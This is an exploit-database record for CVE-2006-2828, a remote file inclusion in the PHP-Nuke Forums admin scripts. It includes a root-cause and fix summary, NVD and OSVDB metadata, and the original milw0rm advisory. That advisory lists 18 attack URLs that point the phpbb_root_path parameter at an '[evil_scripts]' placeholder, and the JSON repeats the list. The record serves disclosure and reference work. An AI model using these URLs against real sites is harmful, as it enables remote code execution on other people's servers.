ID EDB-ID:1866
Type exploitdb
Reporter ddoshomo
Modified 2006-06-02T00:00:00
Description
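PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions. CVE-2006-2828. Webapps exploit for php platform. Root cause, per the CVE description: import_request_variables is executed after $phpbb_root_path has been initialized to a static value, so a request parameter of the same name overwrites it (a global variable overwrite) and the Forums admin scripts then include from an attacker-chosen location. The fix is to make the include base path impossible to overwrite from request input; keeping PHP's remote-URL include settings (allow_url_fopen / allow_url_include) disabled limits the impact to local files.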
# Milli-Harekat Advisory ( www.milli-harekat.org )
# PHP-Nuke <= All version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : PHP NUKE ALL VERSION
# Credits : ERNE
# Thanks : Dj_ReMix,Eskobar,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
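# Vulnerable : the phpbb_root_path request parameter in the following Forums admin scripts (admin_ug_auth.php is listed twice, so 17 distinct scripts are named)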
http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]
# milw0rm.com [2006-06-02]
{"id": "EDB-ID:1866", "hash": "d3847c55ef6679106d35de7670843a12", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP-Nuke <= 7.9 Final phpbb_root_path Remote File Inclusions", "description": "PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions. CVE-2006-2828. Webapps exploit for php platform", "published": "2006-06-02T00:00:00", "modified": "2006-06-02T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/1866/", "reporter": "ddoshomo", "references": [], "cvelist": ["CVE-2006-2828"], "lastseen": "2016-01-31T15:02:26", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-01-31T15:02:26"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-2828"]}, {"type": "osvdb", "idList": ["OSVDB:31776"]}], "modified": "2016-01-31T15:02:26"}, "vulnersScore": 6.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1866/", "sourceData": "# Milli-Harekat Advisory ( www.milli-harekat.org )\n# PHP-Nuke <= All version - Remote File Include Vulnerabilities\n# Risk : High\n# Class: Remote\n# Script : PHP NUKE ALL VERSION\n# Credits : ERNE\n# Thanks : Dj_ReMix,Eskobar,TR_IP,\u00c3\u0178y KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS\n# Vulnerable 
:\n\nhttp://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]\n\n# milw0rm.com [2006-06-02]\n", "osvdbidlist": ["31776"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:32", "bulletinFamily": "NVD", "description": "Global variable overwrite vulnerability in PHP-Nuke allows remote attackers to conduct remote PHP file inclusion attacks via a modified phpbb_root_path parameter to the admin scripts (1) index.php, (2) admin_ug_auth.php, (3) admin_board.php, (4) admin_disallow.php, (5) admin_forumauth.php, (6) admin_groups.php, (7) admin_ranks.php, (8) admin_styles.php, (9) admin_user_ban.php, (10) admin_words.php, (11) admin_avatar.php, (12) admin_db_utilities.php, (13) admin_forum_prune.php, (14) admin_forums.php, (15) admin_mass_email.php, (16) admin_smilies.php, (17) admin_ug_auth.php, and (18) admin_users.php, which overwrites $phpbb_root_path when the import_request_variables function is executed after $phpbb_root_path has been initialized to a static value.", "modified": "2018-10-18T16:43:00", "id": "CVE-2006-2828", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2828", "published": "2006-06-05T20:06:00", "title": "CVE-2006-2828", "type": "cve", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://www.securityfocus.com/archive/1/archive/1/435705/100/0/threaded\nMail List Post: http://www.securityfocus.com/archive/1/archive/1/435407/100/0/threaded\nMail List Post: http://www.securityfocus.com/archive/1/archive/1/435611/100/0/threaded\nISS X-Force ID: 27368\n[CVE-2006-2828](https://vulners.com/cve/CVE-2006-2828)\n", "modified": "2006-05-30T00:00:00", "published": "2006-05-30T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:31776", "id": "OSVDB:31776", "title": "PHP-Nuke mainfile.php phpbb_root_path Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}